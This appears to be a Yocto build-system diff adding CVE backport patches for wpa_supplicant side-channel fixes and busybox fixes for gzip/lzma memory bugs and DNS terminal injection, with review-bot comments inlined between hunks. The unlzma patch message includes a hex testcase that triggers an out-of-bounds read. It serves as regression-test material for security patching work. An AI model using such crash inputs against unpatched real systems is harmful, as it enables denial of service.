+ u8 prime[SAE_MAX_ECC_PRIME_LEN];
+ size_t prime_len;
+- struct crypto_bignum *x = NULL, *qr = NULL, *qnr = NULL;
++ struct crypto_bignum *x = NULL, *y = NULL, *qr = NULL, *qnr = NULL;
+ u8 x_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 x_cand_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qr_bin[SAE_MAX_ECC_PRIME_LEN];
+ u8 qnr_bin[SAE_MAX_ECC_PRIME_LEN];
++ u8 x_y[2 * SAE_MAX_ECC_PRIME_LEN];
+ int res = -1;
+ u8 found = 0; /* 0 (false) or 0xff (true) to be used as const_time_*
+ * mask */
++ unsigned int is_eq;
+
+ os_memset(x_bin, 0, sizeof(x_bin));
+
+@@ -402,25 +404,42 @@ static int sae_derive_pwe_ecc(struct sae_data *sae, const u8 *addr1,
+ goto fail;
+ }
+
+- if (!sae->tmp->pwe_ecc)
+- sae->tmp->pwe_ecc = crypto_ec_point_init(sae->tmp->ec);
+- if (!sae->tmp->pwe_ecc)
+- res = -1;
+- else
+- res = crypto_ec_point_solve_y_coord(sae->tmp->ec,
+- sae->tmp->pwe_ecc, x,
+- pwd_seed_odd);
+- if (res < 0) {
+- /*
+- * This should not happen since we already checked that there
+- * is a result.
+- */
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(save) == LSB(y): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(sae->tmp->ec, x);
++ if (!y ||
++ dragonfly_sqrt(sae->tmp->ec, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, SAE_MAX_ECC_PRIME_LEN,
++ prime_len) < 0 ||
++ crypto_bignum_sub(sae->tmp->prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ SAE_MAX_ECC_PRIME_LEN, prime_len) < 0) {
+ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ is_eq = const_time_eq(pwd_seed_odd, x_y[prime_len - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + SAE_MAX_ECC_PRIME_LEN,
++ prime_len, x_y + prime_len);
++ os_memcpy(x_y, x_bin, prime_len);
++ wpa_hexdump_key(MSG_DEBUG, "SAE: PWE", x_y, 2 * prime_len);
++ crypto_ec_point_deinit(sae->tmp->pwe_ecc, 1);
++ sae->tmp->pwe_ecc = crypto_ec_point_from_bin(sae->tmp->ec, x_y);
++ if (!sae->tmp->pwe_ecc) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not generate PWE");
++ res = -1;
+ }
+
+ fail:
++ forced_memzero(x_y, sizeof(x_y));
+ crypto_bignum_deinit(qr, 0);
+ crypto_bignum_deinit(qnr, 0);
++ crypto_bignum_deinit(y, 1);
+ os_free(dummy_password);
+ bin_clear_free(tmp_password, password_len);
+ crypto_bignum_deinit(x, 1);
+--
+2.25.1
+
+From 603cd880e7f90595482658a7136fa6a7be5cb485 Mon Sep 17 00:00:00 2001
+From: Jouni Malinen <j@w1.fi>
+Date: Fri, 7 Jan 2022 18:52:27 +0200
+Subject: [PATCH 4/4] EAP-pwd: Derive the y coordinate for PWE with own
+ implementation
+
+The crypto_ec_point_solve_y_coord() wrapper function might not use
+constant time operations in the crypto library and as such, could leak
+side channel information about the password that is used to generate the
+PWE in the hunting and pecking loop. As such, calculate the two possible
+y coordinate values and pick the correct one to use with constant time
+selection.
+
+Signed-off-by: Jouni Malinen <j@w1.fi>
+---
+ src/eap_common/eap_pwd_common.c | 46 ++++++++++++++++++++++++++-------
+ 1 file changed, 36 insertions(+), 10 deletions(-)
+
+diff --git a/src/eap_common/eap_pwd_common.c b/src/eap_common/eap_pwd_common.c
+index 2b2b8efdbd01..ff22b29b087a 100644
+--- a/src/eap_common/eap_pwd_common.c
++++ b/src/eap_common/eap_pwd_common.c
+@@ -127,7 +127,8 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 qr_or_qnr_bin[MAX_ECC_PRIME_LEN];
+ u8 x_bin[MAX_ECC_PRIME_LEN];
+ u8 prime_bin[MAX_ECC_PRIME_LEN];
+- struct crypto_bignum *tmp2 = NULL;
++ u8 x_y[2 * MAX_ECC_PRIME_LEN];
++ struct crypto_bignum *tmp2 = NULL, *y = NULL;
+ struct crypto_hash *hash;
+ unsigned char pwe_digest[SHA256_MAC_LEN], *prfbuf = NULL, ctr;
+ int ret = 0, res;
+@@ -139,6 +140,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ u8 found_ctr = 0, is_odd = 0;
+ int cmp_prime;
+ unsigned int in_range;
++ unsigned int is_eq;
+
+ if (grp->pwe)
+ return -1;
+@@ -151,11 +153,6 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ if (crypto_bignum_to_bin(prime, prime_bin, sizeof(prime_bin),
+ primebytelen) < 0)
+ return -1;
+- grp->pwe = crypto_ec_point_init(grp->group);
+- if (!grp->pwe) {
+- wpa_printf(MSG_INFO, "EAP-pwd: unable to create bignums");
+- goto fail;
+- }
+
+ if ((prfbuf = os_malloc(primebytelen)) == NULL) {
+ wpa_printf(MSG_INFO, "EAP-pwd: unable to malloc space for prf "
+@@ -261,10 +258,37 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ */
+ crypto_bignum_deinit(x_candidate, 1);
+ x_candidate = crypto_bignum_init_set(x_bin, primebytelen);
+- if (!x_candidate ||
+- crypto_ec_point_solve_y_coord(grp->group, grp->pwe, x_candidate,
+- is_odd) != 0) {
+- wpa_printf(MSG_INFO, "EAP-pwd: Could not solve for y");
++ if (!x_candidate)
++ goto fail;
++
++ /* y = sqrt(x^3 + ax + b) mod p
++ * if LSB(y) == LSB(pwd-seed): PWE = (x, y)
++ * else: PWE = (x, p - y)
++ *
++ * Calculate y and the two possible values for PWE and after that,
++ * use constant time selection to copy the correct alternative.
++ */
++ y = crypto_ec_point_compute_y_sqr(grp->group, x_candidate);
++ if (!y ||
++ dragonfly_sqrt(grp->group, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y, MAX_ECC_PRIME_LEN, primebytelen) < 0 ||
++ crypto_bignum_sub(prime, y, y) < 0 ||
++ crypto_bignum_to_bin(y, x_y + MAX_ECC_PRIME_LEN,
++ MAX_ECC_PRIME_LEN, primebytelen) < 0) {
++ wpa_printf(MSG_DEBUG, "SAE: Could not solve y");
++ goto fail;
++ }
++
++ /* Constant time selection of the y coordinate from the two
++ * options */
++ is_eq = const_time_eq(is_odd, x_y[primebytelen - 1] & 0x01);
++ const_time_select_bin(is_eq, x_y, x_y + MAX_ECC_PRIME_LEN,
++ primebytelen, x_y + primebytelen);
++ os_memcpy(x_y, x_bin, primebytelen);
++ wpa_hexdump_key(MSG_DEBUG, "EAP-pwd: PWE", x_y, 2 * primebytelen);
++ grp->pwe = crypto_ec_point_from_bin(grp->group, x_y);
++ if (!grp->pwe) {
++ wpa_printf(MSG_DEBUG, "EAP-pwd: Could not generate PWE");
+ goto fail;
+ }
+
+@@ -289,6 +313,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ /* cleanliness and order.... */
+ crypto_bignum_deinit(x_candidate, 1);
+ crypto_bignum_deinit(tmp2, 1);
++ crypto_bignum_deinit(y, 1);
+ crypto_bignum_deinit(qr, 1);
+ crypto_bignum_deinit(qnr, 1);
+ bin_clear_free(prfbuf, primebytelen);
+@@ -296,6 +321,7 @@ int compute_password_element(EAP_PWD_group *grp, u16 num,
+ os_memset(qnr_bin, 0, sizeof(qnr_bin));
+ os_memset(qr_or_qnr_bin, 0, sizeof(qr_or_qnr_bin));
+ os_memset(pwe_digest, 0, sizeof(pwe_digest));
++ forced_memzero(x_y, sizeof(x_y));
+
+ return ret;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
index 7cc03fef7d..a8fb34b1a1 100644
--- a/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
+++ b/meta/recipes-connectivity/wpa-supplicant/wpa-supplicant_2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "Client for Wi-Fi Protected Access (WPA)"
HOMEPAGE = "http://w1.fi/wpa_supplicant/"
+DESCRIPTION = "wpa_supplicant is a WPA Supplicant for Linux, BSD, Mac OS X, and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). Supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver."
BUGTRACKER = "http://w1.fi/security/"
SECTION = "network"
LICENSE = "BSD-3-Clause"
@@ -29,6 +30,10 @@ SRC_URI = "http://w1.fi/releases/wpa_supplicant-${PV}.tar.gz \
file://0001-WPS-UPnP-Do-not-allow-event-subscriptions-with-URLs-.patch \
file://0002-WPS-UPnP-Fix-event-message-generation-using-a-long-U.patch \
file://0003-WPS-UPnP-Handle-HTTP-initiation-failures-for-events-.patch \
+ file://CVE-2021-0326.patch \
+ file://CVE-2021-27803.patch \
+ file://CVE-2021-30004.patch \
+ file://CVE-2022-23303-4.patch \
"
SRC_URI[md5sum] = "2d2958c782576dc9901092fbfecb4190"
SRC_URI[sha256sum] = "fcbdee7b4a64bea8177973299c8c824419c413ec2e3a95db63dd6a5dc3541f17"
diff --git a/meta/recipes-core/base-files/base-files/hosts b/meta/recipes-core/base-files/base-files/hosts
index b94f414d5c..10a5b6c704 100644
--- a/meta/recipes-core/base-files/base-files/hosts
+++ b/meta/recipes-core/base-files/base-files/hosts
@@ -1,4 +1,4 @@
-127.0.0.1 localhost.localdomain localhost
+127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
diff --git a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
index d01cd7e297..65b3cd778d 100644
--- a/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
+++ b/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb
@@ -1,5 +1,6 @@
SUMMARY = "Base system master password/group files"
DESCRIPTION = "The master copies of the user database files (/etc/passwd and /etc/group). The update-passwd tool is also provided to keep the system databases synchronized with these master files."
+HOMEPAGE = "https://launchpad.net/base-passwd"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=eb723b61539feef013de476e68b5c50a"
diff --git a/meta/recipes-core/busybox/busybox.inc b/meta/recipes-core/busybox/busybox.inc
index e0522be729..f0c5666f47 100644
--- a/meta/recipes-core/busybox/busybox.inc
+++ b/meta/recipes-core/busybox/busybox.inc
@@ -139,6 +139,10 @@ do_configure () {
do_prepare_config
merge_config.sh -m .config ${@" ".join(find_cfgs(d))}
cml1_do_configure
+
+ # Save a copy of .config and autoconf.h.
+ cp .config .config.orig
+ cp include/autoconf.h include/autoconf.h.orig
}
do_compile() {
@@ -146,13 +150,17 @@ do_compile() {
if [ "${BUILD_REPRODUCIBLE_BINARIES}" = "1" ]; then
export KCONFIG_NOTIMESTAMP=1
fi
+
+ # Ensure we start do_compile with the original .config and autoconf.h.
+ # These files should always have matching timestamps.
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
+
if [ "${BUSYBOX_SPLIT_SUID}" = "1" -a x`grep "CONFIG_FEATURE_INDIVIDUAL=y" .config` = x ]; then
+ # Guard againt interrupted do_compile: clean temporary files.
+ rm -f .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+
# split the .config into two parts, and make two busybox binaries
- if [ -e .config.orig ]; then
- # Need to guard again an interrupted do_compile - restore any backup
- cp .config.orig .config
- fi
- cp .config .config.orig
oe_runmake busybox.cfg.suid
oe_runmake busybox.cfg.nosuid
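Review bot: The comment added at the top of do_compile says `.config` and `include/autoconf.h` "should always have matching timestamps", but the plain `cp` calls below it stamp each restored file with the time of the copy, not the saved one. If the build depends on the relative age of the two files (not visible here), `cp -p .config.orig .config` and `cp -p include/autoconf.h.orig include/autoconf.h` would keep the saved mtimes; the same applies to the save in do_configure and the restore at the end of do_compile in the neighbouring hunks. Otherwise the comment should say that only the copy order matters. The comment `# Guard againt interrupted do_compile` also has a typo ("against"). do_compile's body continues outside this hunk.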
@@ -189,15 +197,18 @@ do_compile() {
bbfatal "busybox suid binary incorrectly provides /bin/sh"
fi
- # copy .config.orig back to .config, because the install process may check this file
- cp .config.orig .config
# cleanup
- rm .config.orig .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
+ rm .config.app.suid .config.app.nosuid .config.disable.apps .config.nonapps
else
oe_runmake busybox_unstripped
cp busybox_unstripped busybox
oe_runmake busybox.links
fi
+
+ # restore original .config and autoconf.h, because the install process
+ # may check these files
+ cp .config.orig .config
+ cp include/autoconf.h.orig include/autoconf.h
}
do_install () {
@@ -348,7 +359,7 @@ do_install_ptest () {
# These access the internet which is not guaranteed to work on machines running the tests
rm -rf ${D}${PTEST_PATH}/testsuite/wget
sort ${B}/.config > ${D}${PTEST_PATH}/.config
- ln -s /bin/busybox ${D}${PTEST_PATH}/busybox
+ ln -s ${base_bindir}/busybox ${D}${PTEST_PATH}/busybox
}
inherit update-alternatives
diff --git a/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
new file mode 100644
index 0000000000..b75f0907e7
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch
@@ -0,0 +1,51 @@
+From fe791386ebc270219ca00406c9fdadc5130b64ee Mon Sep 17 00:00:00 2001
+From: Samuel Sapalski <samuel.sapalski@nokia.com>
+Date: Wed, 3 Mar 2021 16:31:22 +0100
+Subject: [PATCH] decompress_gunzip: Fix DoS if gzip is corrupt
+
+On certain corrupt gzip files, huft_build will set the error bit on
+the result pointer. If afterwards abort_unzip is called huft_free
+might run into a segmentation fault or an invalid pointer to
+free(p).
+
+In order to mitigate this, we check in huft_free if the error bit
+is set and clear it before the linked list is freed.
+
+Signed-off-by: Samuel Sapalski <samuel.sapalski@nokia.com>
+Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-28831
+Comment: One hunk from this patch is removed as it was not relevant.
+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
+---
+ archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
+ 1 file changed, 10 insertions(+), 2 deletions(-)
+
+diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
+index eb3b64930..e93cd5005 100644
+--- a/archival/libarchive/decompress_gunzip.c
++++ b/archival/libarchive/decompress_gunzip.c
+@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
+ * each table.
+ * t: table to free
+ */
++#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
++#define ERR_RET ((huft_t*)(uintptr_t)1)
+ static void huft_free(huft_t *p)
+ {
+ huft_t *q;
+
++ /*
++ * If 'p' has the error bit set we have to clear it, otherwise we might run
++ * into a segmentation fault or an invalid pointer to free(p)
++ */
++ if (BAD_HUFT(p)) {
++ p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
++ }
++
+ /* Go through linked list, freeing from the malloced (t[-1]) address. */
+ while (p) {
+ q = (--p)->v.t;
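Review bot: The patch header does not match the hunk it carries: the diffstat says `10 insertions(+), 2 deletions(-)` while the only hunk adds ten lines and removes none, and `Upstream-Status: Backport` names no upstream commit. The dropped hunk presumably removed a later definition of `BAD_HUFT`/`ERR_RET`; if the target source still has one, the definitions now added above `huft_free` must stay token-identical to it or the compiler will flag a macro redefinition. I would write the status as `Upstream-Status: Backport [<upstream commit URL>]` and have the `Comment:` line say which hunk was dropped and why, so the backport can be audited against upstream. huft_free's body continues outside the hunk.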
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
+From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:14:33 +0000
+Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
+ returned for the hostname part
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ libbb/xconnect.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libbb/xconnect.c b/libbb/xconnect.c
+index eb2871cb1..b5520bb21 100644
+--- a/libbb/xconnect.c
++++ b/libbb/xconnect.c
+@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ );
+ if (rc)
+ return NULL;
++ /* ensure host contains only printable characters */
+ if (flags & IGNORE_PORT)
+- return xstrdup(host);
++ return xstrdup(printable_string(host));
+ #if ENABLE_FEATURE_IPV6
+ if (sa->sa_family == AF_INET6) {
+ if (strchr(host, ':')) /* heh, it's not a resolved hostname */
+@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ #endif
+ /* For now we don't support anything else, so it has to be INET */
+ /*if (sa->sa_family == AF_INET)*/
+- return xasprintf("%s:%s", host, serv);
++ return xasprintf("%s:%s", printable_string(host), serv);
+ /*return xstrdup(host);*/
+ }
+
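Review bot: Only the two return statements visible in these hunks pass `host` through `printable_string()`; the `#if ENABLE_FEATURE_IPV6` branch between them tests `strchr(host, ':')`, and its own return is not shown. If that branch also formats `host` into the result, it needs the same `printable_string(host)` wrapping, otherwise a looked-up name containing `:` bypasses the filter. The header marks this CVE fix as `Upstream-Status: Pending` without saying where it was submitted, which is worth recording for later audits. sockaddr2str starts and ends outside the hunks.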
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
+From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Thu, 24 Jun 2021 19:13:22 +0200
+Subject: [PATCH] mktemp: add tmpdir option
+
+Make mktemp more compatible with coreutils.
+- add "--tmpdir" option
+- add long variants for "d,q,u" options
+
+Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ coreutils/mktemp.c | 26 ++++++++++++++++++--------
+ 1 file changed, 18 insertions(+), 8 deletions(-)
+
+diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
+index 5393320a5..05c6d98c6 100644
+--- a/coreutils/mktemp.c
++++ b/coreutils/mktemp.c
+@@ -39,16 +39,17 @@
+ //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
+
+ //usage:#define mktemp_trivial_usage
+-//usage: "[-dt] [-p DIR] [TEMPLATE]"
++//usage: "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
+ //usage:#define mktemp_full_usage "\n\n"
+ //usage: "Create a temporary file with name based on TEMPLATE and print its name.\n"
+ //usage: "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
+ //usage: "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
+-//usage: "\n -d Make directory, not file"
+-//usage: "\n -q Fail silently on errors"
+-//usage: "\n -t Prepend base directory name to TEMPLATE"
+-//usage: "\n -p DIR Use DIR as a base directory (implies -t)"
+-//usage: "\n -u Do not create anything; print a name"
++//usage: "\n -d Make directory, not file"
++//usage: "\n -q Fail silently on errors"
++//usage: "\n -t Prepend base directory name to TEMPLATE"
++//usage: "\n -p DIR, --tmpdir[=DIR] Use DIR as a base directory (implies -t)"
++//usage: "\n For --tmpdir is a optional one."
++//usage: "\n -u Do not create anything; print a name"
+ //usage: "\n"
+ //usage: "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
+ //usage:
+@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ OPT_t = 1 << 2,
+ OPT_p = 1 << 3,
+ OPT_u = 1 << 4,
++ OPT_td = 1 << 5,
+ };
+
+ path = getenv("TMPDIR");
+ if (!path || path[0] == '\0')
+ path = "/tmp";
+
+- opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
++ opts = getopt32long(argv, "^"
++ "dqtp:u\0"
++ "?1" /* 1 arg max */,
++ "directory\0" No_argument "d"
++ "quiet\0" No_argument "q"
++ "dry-run\0" No_argument "u"
++ "tmpdir\0" Optional_argument "\xff"
++ , &path, &path
++ );
+
+ chp = argv[optind];
+ if (!chp) {
+@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ goto error;
+ }
+ #endif
+- if (opts & (OPT_t|OPT_p))
++ if (opts & (OPT_t|OPT_p|OPT_td))
+ chp = concat_path_file(path, chp);
+
+ if (opts & OPT_u) {
+--
+2.11.0
+
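Review bot: The new usage line `For --tmpdir is a optional one.` does not say what is optional; wording such as `DIR is optional with --tmpdir` would state it. In `mktemp_main`, `getopt32long` now receives `&path` twice and `--tmpdir` takes an optional argument. A comment should say what `path` holds when `--tmpdir` is given without `=DIR`, since `concat_path_file(path, chp)` uses it right after; presumably it keeps the `$TMPDIR`-or-`/tmp` default set just above, to be confirmed against getopt32long. mktemp_main continues outside the hunks.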
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
+From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:16:45 +0000
+Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
+
+Otherwise, terminal sequences can be injected, which enables various terminal injection
+attacks from DNS results.
+
+MJ: One chunk wasn't applicable on 1.31.1 version, because parsing of
+SRV records was added only in newer 1.32.0 with:
+ commit 6b4960155e94076bf25518e4e268a7a5f849308e
+ Author: Jo-Philipp Wich <jo@mein.io>
+ Date: Thu Jun 27 17:27:29 2019 +0200
+
+ nslookup: implement support for SRV records
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ networking/nslookup.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/networking/nslookup.c b/networking/nslookup.c
+index 24e09d4f0..89b9c8a13 100644
+--- a/networking/nslookup.c
++++ b/networking/nslookup.c
+@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Unable to uncompress domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf(format, ns_rr_name(rr), dname);
++ printf(format, ns_rr_name(rr), printable_string(dname));
+ break;
+
+ case ns_t_mx:
+@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ //printf("Cannot uncompress MX domain: %s\n", strerror(errno));
+ return -1;
+ }
+- printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
++ printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
+ break;
+
+ case ns_t_txt:
+@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ if (n > 0) {
+ memset(dname, 0, sizeof(dname));
+ memcpy(dname, ns_rr_rdata(rr) + 1, n);
+- printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
++ printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
+ }
+ break;
+
+@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ return -1;
+ }
+
+- printf("\tmail addr = %s\n", dname);
++ printf("\tmail addr = %s\n", printable_string(dname));
+ cp += n;
+
+ printf("\tserial = %lu\n", ns_get32(cp));
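Review bot: The subject says all printed strings are sanitized, but in the changed `printf` calls of `parse_reply` only `dname` goes through `printable_string()`; `ns_rr_name(rr)` is still printed with a plain `%s` in the same calls, for example `printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));`. The record name presumably comes from the same DNS reply, so it should get the same filtering before it reaches the terminal. Before wrapping both arguments in one call, check whether `printable_string()` returns a shared static buffer; if it does, copy the first result before making the second call. parse_reply starts and ends outside the hunks.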
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
+From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 15:07:57 +0200
+Subject: [PATCH] unlzma: fix a case where we could read before beginning of
+ buffer
+Cc: pavel@zhukoff.net
+
+Testcase:
+
+ 21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
+ 00 17 02 10 11 0f ff 00 16 00 00
+
+Unfortunately, the bug is not reliably causing a segfault,
+the behavior depends on what's in memory before the buffer.
+
+function old new delta
+unpack_lzma_stream 2762 2768 +6
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42374
+Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
+Comment: testdata dropped because of binary format
+
+---
+ archival/libarchive/decompress_unlzma.c | 5 ++++-
+ testsuite/unlzma.tests | 17 +++++++++++++----
+ testsuite/unlzma_issue_3.lzma | Bin 0 -> 27 bytes
+ 3 files changed, 17 insertions(+), 5 deletions(-)
+ create mode 100644 testsuite/unlzma_issue_3.lzma
+
+diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
+index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
+--- a/archival/libarchive/decompress_unlzma.c
++++ b/archival/libarchive/decompress_unlzma.c
+@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
+ uint32_t pos;
+
+ pos = buffer_pos - rep0;
+- if ((int32_t)pos < 0)
++ if ((int32_t)pos < 0) {
+ pos += header.dict_size;
++ if ((int32_t)pos < 0)
++ goto bad;
++ }
+ match_byte = buffer[pos];
+ do {
+ int bit;
+--
+2.34.0
+
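Review bot: The header's diffstat still lists `testsuite/unlzma.tests` and `testsuite/unlzma_issue_3.lzma` (`3 files changed, 17 insertions(+), 5 deletions(-)`), but only the `decompress_unlzma.c` hunk is carried, so the regression test for this read before the buffer start is not part of the backport. The `Comment:` line mentions only the binary testdata; it should also record the dropped test script, for example `Comment: testsuite changes (unlzma.tests and binary testdata) dropped`. Without the test, a later rebase that loses the added `goto bad` check would go unnoticed by ptest. unpack_lzma_stream continues outside the hunk.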
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
+From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 16:05:57 +0200
+Subject: hush: fix handling of \^C and "^C"
+
+function old new delta
+parse_stream 2238 2252 +14
+encode_string 243 256 +13
+------------------------------------------------------------------------------
+(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0) Total: 27 bytes
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42376
+Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
+Comment: No changes in any hunk
+---
+ shell/ash_test/ash-misc/control_char3.right | 1 +
+ shell/ash_test/ash-misc/control_char3.tests | 2 ++
